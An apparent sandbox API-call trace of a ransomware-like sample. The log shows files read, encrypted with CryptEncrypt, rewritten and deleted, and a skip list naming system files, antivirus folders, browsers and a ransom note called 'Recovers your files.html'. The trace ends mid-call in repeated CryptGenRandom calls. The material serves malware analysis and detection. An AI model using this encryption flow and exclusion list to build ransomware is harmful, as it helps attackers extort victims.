WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.051] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.051] GetLastError () returned 0x0 [0164.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.051] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.052] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.052] GetLastError () returned 0x0 [0164.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.054] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf") returned 1 [0164.054] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0 [0164.055] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" [0164.055] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.055] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF448.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf448.tmp")) returned 0xf448 [0164.056] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF448.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf448.tmp"), dwFlags=0x1) returned 0 [0164.057] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF448.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf448.tmp")) returned 1 [0164.057] CryptDestroyKey (hKey=0x9ad478) returned 1 [0164.057] wcslen (_String="OK") returned 0x2 [0164.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.057] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0164.057] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0164.057] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*NMCRYPT") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.exe") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.dll") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.lnk") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.bat") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.ini") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.msi") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*.scf") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*AppData*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\java\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\windows\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*Atheros*") returned 0 [0164.057] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*Realtek*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*bootmgr*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*boot*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*boot*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*IO.SYS*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*ntldr*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*chrome*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*opera*") returned 0 [0164.058] PathMatchSpecW (pszFile="Monet.jpg", pszSpec="*firefox*") returned 0 [0164.058] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg", pszSpec="*") returned 1 [0164.058] strlen (_Str="NMoreira") returned 0x8 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.058] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.059] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: 